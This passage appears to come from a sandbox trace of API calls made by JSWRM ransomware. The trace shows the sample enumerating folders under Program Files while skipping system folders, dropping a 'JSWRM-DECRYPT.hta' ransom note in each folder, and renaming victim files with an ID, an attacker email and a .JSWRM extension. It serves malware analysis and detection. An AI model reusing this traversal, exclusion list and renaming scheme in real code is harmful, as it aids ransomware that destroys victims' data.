ftLastAccessTime.dwLowDateTime=0x1f084cde, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f0aace0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.741] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.741] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.741] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.741] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.741] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.741] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.741] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.741] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.741] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.741] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0067.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0067.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0067.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0067.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0067.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0067.742] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2f0ba2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2f0ba2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2f0ba2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.742] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.742] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.742] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.742] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.742] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.742] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.742] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.742] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.742] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.742] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0067.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0067.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0067.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.742] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10078810777312024) returned 0 [0067.742] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.743] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.743] CloseHandle (hObject=0xffffffff) returned 1 [0067.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0067.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0067.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0067.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0067.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0067.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0067.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.743] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0067.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0067.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0067.743] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2f0ba2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2f0ba2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2f0ba2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.743] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0067.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0067.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.743] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="el-GR", cAlternateFileName="")) returned 1 [0067.744] lstrcmpiW (lpString1="el-GR", lpString2=".") returned 1 [0067.744] lstrcmpiW (lpString1="el-GR", lpString2="..") returned 1 [0067.744] lstrcmpiW (lpString1="el-GR", lpString2="...") returned 1 [0067.744] lstrcmpiW (lpString1="el-GR", lpString2="windows") returned -1 [0067.744] lstrcmpiW (lpString1="el-GR", lpString2="recovery") returned -1 [0067.744] lstrcmpiW (lpString1="el-GR", lpString2="perflogs") returned -1 [0067.744] lstrcmpiW (lpString1="el-GR", lpString2="documents and settings") returned 1 [0067.744] lstrcmpiW (lpString1="el-GR", lpString2="$RECYCLE.BIN") returned 1 [0067.744] lstrcmpiW (lpString1="el-GR", lpString2="system volume information") returned -1 [0067.744] lstrcmpiW (lpString1="el-GR", lpString2="msocache") returned -1 [0067.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0067.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0067.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0067.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.744] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\jswrm-decrypt.hta")) returned 0xffffffff [0067.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0067.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0067.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.745] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.745] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.746] CloseHandle (hObject=0x454) returned 1 [0067.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0067.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0067.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0067.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0067.746] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\jswrm-decrypt.hta")) returned 0x20 [0067.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0067.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0067.746] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f0aace0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0067.746] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.746] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f0aace0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.746] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.746] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.746] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f0aace0, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f0aace0, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f0aace0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.747] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.747] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.747] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.747] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.747] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.747] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.747] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.747] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.747] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.747] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0067.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0067.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0067.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0067.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0067.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0067.747] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.747] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.747] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.747] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.747] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.747] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.747] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.747] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.747] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.748] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.748] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0067.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0067.748] RtlAllocateHeap 